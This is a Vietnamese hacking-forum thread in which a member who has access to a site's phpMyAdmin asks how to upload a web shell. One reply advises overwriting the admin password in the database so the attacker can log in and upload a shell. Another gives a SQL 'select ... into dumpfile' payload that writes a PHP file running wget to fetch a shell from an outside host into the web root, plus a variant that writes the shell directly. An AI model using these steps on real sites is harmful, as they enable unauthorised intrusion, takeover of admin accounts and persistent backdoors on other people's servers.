| [Question] hỏi về upshell VIA phpmyadmin |
23/12/2011 13:35:14 (+0700) | #1 | 251458 |
ni.online
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 12/08/2008 23:02:04
Messages: 3
Offline
|
|
e là newbie mới post bài lần đầu có gì sai mong các a bỏ qua
e có thể vào được phpmyadmin rùi site đó cho mình run SQL nhưng e không thể kiếm được path của nó để cho mình run
Làm sao mình có thể coi được phpmyadmin info của nó đối với phpMyAdmin - 2.11.4 |
|
|
 |
|
| [Question] hỏi về upshell VIA phpmyadmin |
24/12/2011 20:56:31 (+0700) | #2 | 251488 |
chimung
Member
|
|
0 |
|
|
Joined: 23/10/2008 22:23:45
Messages: 24
Offline
|
|
Theo mình, bạn có thể upshell qua admin_page
+ Xem table của admin trong myphpadmin ==> edit lại pass để logi vào admin_page
+ Qua admin_page ta upshell lên thui (Cái này còn tuỳ thuộc vào code của site + khả năng bypass của bạn)
Chúc may mắn 
|
|
|
| [Question] hỏi về upshell VIA phpmyadmin |
25/12/2011 05:31:39 (+0700) | #3 | 251494 |
ni.online
Member
|
|
0 |
|
|
Joined: 12/08/2008 23:02:04
Messages: 3
Offline
|
|
cái file admin_page mình kiếm đau có thấy đâu bạn ???
ngoài ra còn có khả năng khác để mình upload shell kg bạn |
|
|
| [Question] hỏi về upshell VIA phpmyadmin |
25/12/2011 13:40:55 (+0700) | #4 | 251501 |
kenshin19xx
Member
|
|
0 |
|
|
Joined: 09/11/2011 04:32:19
Messages: 18
Offline
|
|
có thể nếu như mysql user của bạn là root,theo đó bạn có thể
select “<? system(‘wget www.abc.com/shell.txt -O bar.php’); ?>” into dumpfile ‘/opt/lampp/htdocs/dvwa/bad.php’
hoặc select "nội dung shell" into dumpfile 'path/shell.php' |
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận thâm nhập
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")